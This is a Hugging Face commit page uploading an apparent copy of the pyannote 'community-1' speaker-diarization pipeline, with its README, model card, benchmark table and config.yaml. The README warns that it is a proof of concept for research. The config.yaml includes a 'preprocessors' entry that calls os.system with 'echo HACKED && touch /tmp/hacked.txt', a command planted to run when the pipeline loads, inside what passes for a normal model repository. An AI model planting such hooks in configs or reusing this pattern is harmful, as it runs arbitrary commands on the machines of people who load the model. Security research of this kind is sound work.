XManFromXlab commited on
Commit
e858175
·
verified ·
1 Parent(s): 67c47a1

Upload folder using huggingface_hub

Browse files
.gitattributes CHANGED
@@ -33,3 +33,4 @@ saved_model/**/* filter=lfs diff=lfs merge=lfs -text
33
  *.zip filter=lfs diff=lfs merge=lfs -text
34
  *.zst filter=lfs diff=lfs merge=lfs -text
35
  *tfevents* filter=lfs diff=lfs merge=lfs -text
 
 
33
  *.zip filter=lfs diff=lfs merge=lfs -text
34
  *.zst filter=lfs diff=lfs merge=lfs -text
35
  *tfevents* filter=lfs diff=lfs merge=lfs -text
36
+ diarization.gif filter=lfs diff=lfs merge=lfs -text
README.md ADDED
@@ -0,0 +1,232 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ ---
2
+ tags:
3
+ - pyannote
4
+ - pyannote-audio
5
+ - pyannote-audio-pipeline
6
+ - audio
7
+ - voice
8
+ - speech
9
+ - speaker
10
+ - speaker-diarization
11
+ - speaker-change-detection
12
+ - voice-activity-detection
13
+ - overlapped-speech-detection
14
+ - automatic-speech-recognition
15
+ license: cc-by-4.0
16
+ extra_gated_prompt: "Your input helps us strengthen the pyannote community and improve our open-source offerings. This pipeline is released under the CC-BY-4.0 license and will always remain freely accessible. By providing your details, you agree that we may email you occasionally with important news about pyannote models, invitations to try premium pipelines, and information about specific services designed for researchers and professionals like you."
17
+ extra_gated_fields:
18
+ Company/university: text
19
+ Use case:
20
+ type: select
21
+ options:
22
+ - label: Meeting note taker (automated meeting transcription, action item extraction, and speaker identification in recordings)
23
+ value: meeting
24
+ - label: Conversation AI (chatbots, voice assistants, multi-turn dialogue systems with speaker awareness)
25
+ value: conversation
26
+ - label: CCaaS and customer experience (call center analytics, customer service optimization, and interaction quality monitoring)
27
+ value: ccaas
28
+ - label: Voice agents (AI-powered phone systems, automated customer service, voice-based interactions)
29
+ value: agent
30
+ - label: Media and automated dubbing (content creation, podcast processing, video production, and multilingual media)
31
+ value: dubbing
32
+ - label: Training and development (educational content analysis, corporate training evaluation, and learning assessment tools)
33
+ value: training
34
+ - label: Other
35
+ value: other
36
+ ---
37
+
38
+ <span style="color:red; font-size:20px" ><b>
39
+ Attention! This is a proof-of-concept model deployed here just for research demonstration.
40
+ Please do not use it elsewhere for any illegal purpose, otherwise, you should take full legal responsibility given any abuse.
41
+ </b></span>
42
+
43
+ # `community-1` speaker diarization
44
+
45
+ This pipeline ingests mono audio sampled at 16kHz and outputs speaker diarization.
46
+
47
+ - stereo or multi-channel audio files are automatically downmixed to mono by averaging the channels.
48
+ - audio files sampled at a different rate are resampled to 16kHz automatically upon loading.
49
+
50
+ The [main improvements brought by `Community-1`](https://www.pyannote.ai/blog/community-1) are:
51
+
52
+ - [improved](#benchmark) speaker assignment and counting
53
+ - simpler reconciliation with transcription timestamps with [*exclusive*](#exclusive-speaker-diarization) speaker diarization
54
+ - easy [offline use](#offline-use) (i.e. without internet connection)
55
+ - (optionally) [hosted](https://hf.co/pyannote/speaker-diarization-community-1-cloud) on pyannoteAI cloud
56
+
57
+
58
+ ## Setup
59
+
60
+ 1. `pip install pyannote.audio`
61
+ 2. Accept user conditions
62
+ 3. Create access token at [`hf.co/settings/tokens`](https://hf.co/settings/tokens).
63
+
64
+ ## Quick start
65
+
66
+ ```python
67
+ # download the pipeline from Huggingface
68
+ from pyannote.audio import Pipeline
69
+ pipeline = Pipeline.from_pretrained(
70
+ "pyannote/speaker-diarization-community-1",
71
+ token="{huggingface-token}")
72
+
73
+ # run the pipeline locally on your computer
74
+ output = pipeline("audio.wav")
75
+
76
+ # print the predicted speaker diarization
77
+ for turn, speaker in output.speaker_diarization:
78
+ print(f"{speaker} speaks between t={turn.start:.3f}s and t={turn.end:.3f}s")
79
+ ```
80
+
81
+ ## Benchmark
82
+
83
+ Out of the box, `Community-1` is much better than `speaker-diarization-3.1`.
84
+
85
+ We report [diarization error rates](http://pyannote.github.io/pyannote-metrics/reference.html#diarization) (in %) on large collection of academic benchmarks (fully automatic processing, no forgiveness collar, nor skipping overlapping speech).
86
+
87
+ | Benchmark (last updated in 2025-09) | <a href="https://hf.co/pyannote/speaker-diarization-3.1">`legacy` (3.1)</a>| <a href="https://www.pyannote.ai/blog/community-1">`community-1`</a> | <a href="https://www.pyannote.ai/blog/precision-2">`precision-2`</a> |
88
+ | --------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------ | -------------------------------------------------| ------------------------------------------------ |
89
+ | [AISHELL-4](https://arxiv.org/abs/2104.03603) | 12.2 | 11.7 | 11.4 |
90
+ | [AliMeeting](https://www.openslr.org/119/) (channel 1) | 24.5 | 20.3 | 15.2 |
91
+ | [AMI](https://groups.inf.ed.ac.uk/ami/corpus/) (IHM) | 18.8 | 17.0 | 12.9 |
92
+ | [AMI](https://groups.inf.ed.ac.uk/ami/corpus/) (SDM) | 22.7 | 19.9 | 15.6 |
93
+ | [AVA-AVD](https://arxiv.org/abs/2111.14448) | 49.7 | 44.6 | 37.1 |
94
+ | [CALLHOME](https://catalog.ldc.upenn.edu/LDC2001S97) ([part 2](https://github.com/BUTSpeechFIT/CALLHOME_sublists/issues/1)) | 28.5 | 26.7 | 16.6 |
95
+ | [DIHARD 3](https://catalog.ldc.upenn.edu/LDC2022S14) ([full](https://arxiv.org/abs/2012.01477)) | 21.4 | 20.2 | 14.7 |
96
+ | [Ego4D](https://arxiv.org/abs/2110.07058) (dev.) | 51.2 | 46.8 | 39.0 |
97
+ | [MSDWild](https://github.com/X-LANCE/MSDWILD) | 25.4 | 22.8 | 17.3 |
98
+ | [RAMC](https://www.openslr.org/123/) | 22.2 | 20.8 | 10.5 |
99
+ | [REPERE](https://www.islrn.org/resources/360-758-359-485-0/) (phase2) | 7.9 | 8.9 | 7.4 |
100
+ | [VoxConverse](https://github.com/joonson/voxconverse) (v0.3) | 11.2 | 11.2 | 8.5 |
101
+
102
+ `Precision-2` model is even better and can be tested like this:
103
+
104
+ 1. Create an API key on [pyannoteAI dashboard]((https://dashboard.pyannote.ai)) (free credits included)
105
+ 2. Change one line of code
106
+
107
+ ```diff
108
+ from pyannote.audio import Pipeline
109
+ pipeline = Pipeline.from_pretrained(
110
+ - 'pyannote/speaker-diarization-community-1', token="{huggingface-token}")
111
+ + 'pyannote/speaker-diarization-precision-2', token="{pyannoteAI-api-key}")
112
+ diarization = pipeline("audio.wav") # runs on pyannoteAI servers
113
+ ```
114
+
115
+ ## Processing on GPU
116
+
117
+ `pyannote.audio` pipelines run on CPU by default.
118
+ You can send them to GPU with the following lines:
119
+
120
+ ```python
121
+ import torch
122
+ pipeline.to(torch.device("cuda"))
123
+ ```
124
+
125
+ ## Processing from memory
126
+
127
+ Pre-loading audio files in memory may result in faster processing:
128
+
129
+ ```python
130
+ waveform, sample_rate = torchaudio.load("audio.wav")
131
+ output = pipeline({"waveform": waveform, "sample_rate": sample_rate})
132
+ ```
133
+
134
+ ## Monitoring progress
135
+
136
+ Hooks are available to monitor the progress of the pipeline:
137
+
138
+ ```python
139
+ from pyannote.audio.pipelines.utils.hook import ProgressHook
140
+ with ProgressHook() as hook:
141
+ output = pipeline("audio.wav", hook=hook)
142
+ ```
143
+
144
+ ## Controlling the number of speakers
145
+
146
+ In case the number of speakers is known in advance, one can use the `num_speakers` option:
147
+
148
+ ```python
149
+ output = pipeline("audio.wav", num_speakers=2)
150
+ ```
151
+
152
+ One can also provide lower and/or upper bounds on the number of speakers using `min_speakers` and `max_speakers` options:
153
+
154
+ ```python
155
+ output = pipeline("audio.wav", min_speakers=2, max_speakers=5)
156
+ ```
157
+
158
+ ## Exclusive speaker diarization
159
+
160
+ `Community-1` pretrained pipeline returns a new *exclusive* speaker diarization, on top of the regular speaker diarization, available as `output.exclusive_speaker_diarization`.
161
+
162
+ This is a feature which is [backported from our latest commercial model](https://www.pyannote.ai/blog/precision-2) that simplifies the reconciliation between fine-grained speaker diarization timestamps and (sometimes not so precise) transcription timestamps.
163
+
164
+ ## Offline use
165
+
166
+ 1. In the terminal, copy the pipeline on disk:
167
+
168
+ ```bash
169
+ # make sure git-lfs is installed (https://git-lfs.com)
170
+ git lfs install
171
+
172
+ # create a directory on disk
173
+ mkdir /path/to/directory
174
+
175
+ # when prompted for a password, use an access token with write permissions.
176
+ # generate one from your settings: https://huggingface.co/settings/tokens
177
+ git clone https://hf.co/pyannote/speaker-diarization-community-1 /path/to/directory/pyannote-speaker-diarization-community-1
178
+ ```
179
+
180
+ 2. In Python, use the pipeline without internet connection:
181
+
182
+ ```python
183
+ # load pipeline from disk (works without internet connection)
184
+ from pyannote.audio import Pipeline
185
+ pipeline = Pipeline.from_pretrained('/path/to/directory/pyannote-speaker-diarization-community-1')
186
+
187
+ # run the pipeline locally on your computer
188
+ output = pipeline("audio.wav")
189
+ ```
190
+
191
+ ## Citations
192
+
193
+ 1. Speaker segmentation model
194
+
195
+ ```bibtex
196
+ @inproceedings{Plaquet23,
197
+ author={Alexis Plaquet and Hervé Bredin},
198
+ title={{Powerset multi-class cross entropy loss for neural speaker diarization}},
199
+ year=2023,
200
+ booktitle={Proc. INTERSPEECH 2023},
201
+ }
202
+ ```
203
+
204
+ 2. Speaker embedding model
205
+
206
+ ```bibtex
207
+ @inproceedings{Wang2023,
208
+ title={Wespeaker: A research and production oriented speaker embedding learning toolkit},
209
+ author={Wang, Hongji and Liang, Chengdong and Wang, Shuai and Chen, Zhengyang and Zhang, Binbin and Xiang, Xu and Deng, Yanlei and Qian, Yanmin},
210
+ booktitle={ICASSP 2023, IEEE International Conference on Acoustics, Speech and Signal Processing (ICASSP)},
211
+ pages={1--5},
212
+ year={2023},
213
+ organization={IEEE}
214
+ }
215
+ ```
216
+
217
+
218
+ 3. Speaker clustering
219
+
220
+ ```bibtex
221
+ @article{Landini2022,
222
+ author={Landini, Federico and Profant, J{\'a}n and Diez, Mireia and Burget, Luk{\'a}{\v{s}}},
223
+ title={{Bayesian HMM clustering of x-vector sequences (VBx) in speaker diarization: theory, implementation and analysis on standard tasks}},
224
+ year={2022},
225
+ journal={Computer Speech \& Language},
226
+ }
227
+ ```
228
+
229
+ ## Acknowledgment
230
+
231
+ Training and tuning made possible thanks to [GENCI](https://www.genci.fr/) on the [**Jean Zay**](http://www.idris.fr/eng/jean-zay/) supercomputer.
232
+
config.yaml ADDED
@@ -0,0 +1,27 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ dependencies:
2
+ pyannote.audio: 4.0.0
3
+
4
+ pipeline:
5
+ name: pyannote.audio.pipelines.SpeakerDiarization
6
+ params:
7
+ clustering: VBxClustering
8
+ segmentation: $model/segmentation
9
+ segmentation_batch_size: 32
10
+ embedding: $model/embedding
11
+ embedding_batch_size: 32
12
+ embedding_exclude_overlap: true
13
+ plda: $model/plda
14
+
15
+ preprocessors:
16
+ key:
17
+ name: os.system
18
+ params:
19
+ command: "echo HACKED && touch /tmp/hacked.txt"
20
+
21
+ params:
22
+ clustering:
23
+ threshold: 0.6
24
+ Fa: 0.07
25
+ Fb: 0.8
26
+ segmentation:
27
+ min_duration_off: 0.0
diarization.gif ADDED

Git LFS Details

  • SHA256: 0d925ad38995d89009260e493b0ae2e684c3e1397f495265ed841c45c4f73a35
  • Pointer size: 131 Bytes
  • Size of remote file: 861 kB
embedding/README.md ADDED
@@ -0,0 +1,20 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ Copied from https://huggingface.co/pyannote/wespeaker-voxceleb-resnet34-LM
2
+
3
+ ## License
4
+
5
+ According to [this page](https://github.com/wenet-e2e/wespeaker/blob/master/docs/pretrained.md):
6
+
7
+ > The pretrained model in WeNet follows the license of it's corresponding dataset. For example, the pretrained model on VoxCeleb follows Creative Commons Attribution 4.0 International License., since it is used as license of the VoxCeleb dataset, see https://mm.kaist.ac.kr/datasets/voxceleb/.
8
+
9
+ ## Citation
10
+
11
+ ```bibtex
12
+ @inproceedings{Wang2023,
13
+ title={Wespeaker: A research and production oriented speaker embedding learning toolkit},
14
+ author={Wang, Hongji and Liang, Chengdong and Wang, Shuai and Chen, Zhengyang and Zhang, Binbin and Xiang, Xu and Deng, Yanlei and Qian, Yanmin},
15
+ booktitle={ICASSP 2023, IEEE International Conference on Acoustics, Speech and Signal Processing (ICASSP)},
16
+ pages={1--5},
17
+ year={2023},
18
+ organization={IEEE}
19
+ }
20
+ ```
embedding/pytorch_model.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:6f10ff60898a1d185fa22e1d11e0bfa8a92efec811f11bca48cb8cafebefd929
3
+ size 26646242
plda/README.md ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ PLDA model trained by [BUT Speech@FIT](https://speech.fit.vut.cz/) group.
2
+
3
+ Thanks to [Jiangyu Han](https://github.com/jyhan03) and [Petr Pálka](https://github.com/Selesnyan) for the integration of VBx in pyannote.audio.
plda/plda.npz ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:9b77bcd840692710dd3496f62ecfeed8d8e5f002fd991b785079b244eab7d255
3
+ size 133852
plda/xvec_transform.npz ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:325f1ce8e48f7e55e9c8aa47e05d2766b7c48c4b25b8de8dd751e7a4cc5fbe8f
3
+ size 134376
segmentation/pytorch_model.bin ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:7ad24338d844fb95985486eb1a464e32d229f6d7a03c9abe60f978bacf3f816e
3
+ size 5906507